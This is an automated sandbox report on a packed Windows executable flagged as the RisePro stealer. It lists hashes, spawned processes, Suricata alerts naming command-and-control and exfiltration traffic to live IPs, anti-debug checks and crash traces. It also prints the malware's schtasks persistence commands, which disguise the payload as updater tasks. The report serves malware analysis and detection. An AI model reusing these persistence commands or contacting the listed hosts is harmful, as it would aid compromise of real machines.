Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 19, 2024, 7:49 a.m.	Feb. 19, 2024, 7:54 a.m.

Size	900.1KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`9980a0d095ef8f4e841acb5be833f334`
SHA256	`11ec227842ba00708ff69004298ebc7b179dce372a8e681b38a6b92788805de7`
CRC32	`E4651DB0`
ssdeep	`24576:8Kx/XwN/pGGFIiiqepfU/nnKJnivHtRqS8:8KlXK/Dmi6WKJivHqT`
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature Obsidium_Zero - Obsidium protector file

reals.exe "C:\Users\test22\AppData\Local\Temp\reals.exe"
2548
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2680
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2764
- jlzfI3MOMBv1vbp25nBj.exe "C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\jlzfI3MOMBv1vbp25nBj.exe"
  2936
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
    2988
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2988 CREDAT:145409
      3064
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
  2516
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
  2580
- cHXwqlMWUMGBBwN9hxfj.exe "C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\cHXwqlMWUMGBBwN9hxfj.exe"
  2704
- y3p6n3ne22r3BFOUsYqb.exe "C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\y3p6n3ne22r3BFOUsYqb.exe"
  1576
- a77VWg3R2bV_Qy103LSX.exe "C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\a77VWg3R2bV_Qy103LSX.exe"
  2056
- PDbNNj6OmrILaV3JtHH1.exe "C:\Users\test22\AppData\Local\Temp\heidiuMNHkTdTYfan\PDbNNj6OmrILaV3JtHH1.exe"
  2932
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
ssl.gstatic.com	A 216.58.200.227	172.217.25.163
accounts.google.com	A 64.233.188.84	64.233.188.84
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 172.217.25.4	142.250.206.228
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.4.15

IP Address	Status	Action
117.18.232.200	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.4	Active	Moloch
172.67.75.166	Active	Moloch
185.215.113.46	Active	Moloch
193.233.132.62	Active	Moloch
216.58.200.227	Active	Moloch
34.117.186.192	Active	Moloch
64.233.188.84	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2400021	ET DROP Spamhaus DROP Listed Traffic Inbound group 22	Misc Attack
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49165	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49182 -> 64.233.188.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 64.233.188.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49185 -> 216.58.200.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49193 -> 172.217.25.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 193.233.132.62:50500	2049661	ET MALWARE RisePro CnC Activity (Inbound)	A Network Trojan was detected
TCP 192.168.56.101:49184 -> 216.58.200.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.233.132.62:50500 -> 192.168.56.101:49202	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49201	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49204 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49204 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49204 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49202 -> 193.233.132.62:50500	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.101:49208 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 172.67.75.166:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49192 -> 172.217.25.4:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.46:80 -> 192.168.56.101:49176	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 185.215.113.46:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49205 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49168 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49182 64.233.188.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	22:f1:10:1f:49:c5:97:f4:85:76:5a:20:dd:85:7c:ff:e2:c9:2a:1f
TLSv1 192.168.56.101:49183 64.233.188.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	22:f1:10:1f:49:c5:97:f4:85:76:5a:20:dd:85:7c:ff:e2:c9:2a:1f
TLSv1 192.168.56.101:49185 216.58.200.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	f1:41:dd:4f:a6:9f:7b:ae:ae:af:78:bd:08:f8:c8:40:3c:c4:8c:93
TLSv1 192.168.56.101:49193 172.217.25.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	2a:14:a8:9a:ea:5b:44:20:c3:ae:90:ff:4d:2f:4c:22:15:54:f9:7c
TLSv1 192.168.56.101:49184 216.58.200.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	f1:41:dd:4f:a6:9f:7b:ae:ae:af:78:bd:08:f8:c8:40:3c:c4:8c:93
TLSv1 192.168.56.101:49208 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49209 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49192 172.217.25.4:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	2a:14:a8:9a:ea:5b:44:20:c3:ae:90:ff:4d:2f:4c:22:15:54:f9:7c

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameA Feb. 19, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 92 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:49 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0
IsDebuggerPresent Feb. 19, 2024, 7:50 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 19, 2024, 7:49 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 19, 2024, 7:49 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 19, 2024, 7:50 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Feb. 19, 2024, 7:50 a.m.	buffer: SUCCESS: The scheduled task "MSIUpdaterV131 LG" has successfully been created. console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 19, 2024, 7:50 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

One or more processes crashed (50 out of 523 events)

Time & API	Arguments	Status
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 10 eb 03 bc 29 fe 64 8f 00 eb 04 dd 87 e5 5d exception.symbol: reals+0x15c05b exception.instruction: mov edx, dword ptr [eax] exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1425499 exception.address: 0x55c05b registers.esp: 1638272 registers.edi: 0 registers.eax: 0 registers.ebp: 1638292 registers.edx: 5619712 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 00 eb 02 15 31 64 8f 00 eb 02 ea 6a 83 c4 04 exception.symbol: reals+0x15d0bc exception.instruction: mov eax, dword ptr [eax] exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1429692 exception.address: 0x55d0bc registers.esp: 1638240 registers.edi: 0 registers.eax: 0 registers.ebp: 1638292 registers.edx: 3459115899 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: exception.instruction_r: cd 01 40 40 eb 05 de a5 29 fa 0c 85 c0 eb 02 30 exception.symbol: reals+0x172f54 exception.instruction: int 1 exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1519444 exception.address: 0x572f54 registers.esp: 1638232 registers.edi: 5713604 registers.eax: 0 registers.ebp: 4286310820 registers.edx: 0 registers.ebx: 5621232 registers.esi: 5621232 registers.ecx: 5713833	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: exception.instruction_r: 89 0a eb 02 a0 49 e9 61 fd ff ff eb 01 20 ba 50 exception.symbol: reals+0x15eb1a exception.instruction: mov dword ptr [edx], ecx exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1436442 exception.address: 0x55eb1a registers.esp: 1638240 registers.edi: 5705088 registers.eax: 0 registers.ebp: 4286316095 registers.edx: 0 registers.ebx: 31588352 registers.esi: 5621232 registers.ecx: 59399	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: exception.instruction_r: 0f 0b eb 02 e9 b2 0f 0b eb 03 64 39 6b e9 db fe exception.symbol: reals+0x15eb04 exception.instruction: ud2 exception.module: reals.exe exception.exception_code: 0xc000001d exception.offset: 1436420 exception.address: 0x55eb04 registers.esp: 1638240 registers.edi: 6684672 registers.eax: 3721368613 registers.ebp: 4286316095 registers.edx: 6684672 registers.ebx: 31588352 registers.esi: 6684732 registers.ecx: 0	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x1668b4 @ 0x5668b4 reals+0x173709 @ 0x573709 reals+0x15e5f0 @ 0x55e5f0 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x4001000a exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 1637784 registers.edi: 31590972 registers.eax: 1637784 registers.ebp: 1637864 registers.edx: 0 registers.ebx: 6684732 registers.esi: 6688172 registers.ecx: 4	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x15e5f0 @ 0x55e5f0 exception.instruction_r: cd 01 40 40 eb 01 71 85 c0 70 d2 74 5b eb 05 dc exception.instruction: int 1 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x66cc59 registers.esp: 1637904 registers.edi: 31631672 registers.eax: 0 registers.ebp: 1638220 registers.edx: 6737223 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 5629176	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x15e5f0 @ 0x55e5f0 exception.instruction_r: cc eb 02 0a 9a 33 c9 7c bf 8b 83 28 03 00 00 eb exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x66cd71 registers.esp: 1637900 registers.edi: 31635072 registers.eax: 0 registers.ebp: 1638220 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 1637900 registers.ecx: 139	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x66ce04 reals+0x15e5f0 @ 0x55e5f0 exception.instruction_r: 0f 3f 07 0b c7 45 fc ff ff ff ff 33 c0 33 d2 39 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x66cf7a registers.esp: 1637880 registers.edi: 31636528 registers.eax: 1 registers.ebp: 1637892 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 2020557398	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x15e5f0 @ 0x55e5f0 exception.instruction_r: 8b 00 90 90 f8 eb 01 8c 73 42 eb 04 30 8d 07 5f exception.instruction: mov eax, dword ptr [eax] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x66ce34 registers.esp: 1637904 registers.edi: 31636528 registers.eax: 0 registers.ebp: 1638220 registers.edx: 2 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 2130563072	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x15e5f0 @ 0x55e5f0 exception.instruction_r: 90 f8 eb 01 8c 73 42 eb 04 30 8d 07 5f eb 02 89 exception.instruction: nop exception.exception_code: 0x80000004 exception.symbol: exception.address: 0x66ce37 registers.esp: 1637904 registers.edi: 31636528 registers.eax: 0 registers.ebp: 1638220 registers.edx: 2 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 2130563072	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x15e5f0 @ 0x55e5f0 exception.instruction_r: 0f 0b eb 04 87 af 29 ab 0f 0b eb 05 fe e0 3c b5 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x66ce72 registers.esp: 1637904 registers.edi: 31641240 registers.eax: 0 registers.ebp: 1638220 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 235	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9 RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x736f482b KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 reals+0x15e5f0 @ 0x55e5f0 exception.instruction_r: f7 f0 eb 04 63 9a 25 ab eb 01 8a eb 03 be c6 a9 exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x66d01a registers.esp: 1636112 registers.edi: 0 registers.eax: 0 registers.ebp: 1636128 registers.edx: 5629176 registers.ebx: 6737823 registers.esi: 0 registers.ecx: 1636780	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: exception.instruction_r: 89 0a eb 01 7d e9 87 00 00 00 eb 03 1b b6 c7 0f exception.symbol: reals+0x1613ca exception.instruction: mov dword ptr [edx], ecx exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1446858 exception.address: 0x5613ca registers.esp: 1638240 registers.edi: 31649968 registers.eax: 92 registers.ebp: 4286322007 registers.edx: 0 registers.ebx: 31588352 registers.esi: 6684732 registers.ecx: 0	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x1608ff @ 0x5608ff exception.instruction_r: f7 f1 eb 02 15 c7 e9 f6 fd ff ff eb 03 13 15 57 exception.symbol: reals+0x1610dc exception.instruction: div ecx exception.module: reals.exe exception.exception_code: 0xc0000094 exception.offset: 1446108 exception.address: 0x5610dc registers.esp: 1638128 registers.edi: 31649968 registers.eax: 235841139 registers.ebp: 1638220 registers.edx: 5639481 registers.ebx: 6684732 registers.esi: 4194304 registers.ecx: 0	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: exception.instruction_r: f7 f9 eb 03 c5 a8 57 e9 c2 f3 ff ff eb 02 ea 64 exception.symbol: reals+0x1613ba exception.instruction: idiv ecx exception.module: reals.exe exception.exception_code: 0xc0000094 exception.offset: 1446842 exception.address: 0x5613ba registers.esp: 1638240 registers.edi: 32237900 registers.eax: 32237900 registers.ebp: 4286322007 registers.edx: 2130566132 registers.ebx: 31588352 registers.esi: 6684732 registers.ecx: 0	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: exception.instruction_r: cc eb 01 dc 3c 04 eb 04 dc 88 32 2e 75 58 90 90 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x673db9 registers.esp: 1637900 registers.edi: 32259160 registers.eax: 4 registers.ebp: 1111705675 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 121	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x161b32 @ 0x561b32 exception.instruction_r: 0f 0b eb 04 87 af 29 ab 0f 0b eb 05 fe e0 3c b5 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x67491a registers.esp: 1637904 registers.edi: 32263704 registers.eax: 0 registers.ebp: 1638220 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 235	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9 RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x736f482b KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 04 63 9a 25 ab eb 01 8a eb 03 be c6 a9 exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x674ac2 registers.esp: 1636112 registers.edi: 0 registers.eax: 0 registers.ebp: 1636128 registers.edx: 5629176 registers.ebx: 6769223 registers.esi: 0 registers.ecx: 1636780	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: 0f 0b 0f 0b eb b7 eb 03 dd ca 17 eb 04 3d 32 08 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x6751d8 registers.esp: 1637892 registers.edi: 32266480 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6770680 registers.ecx: 10	1
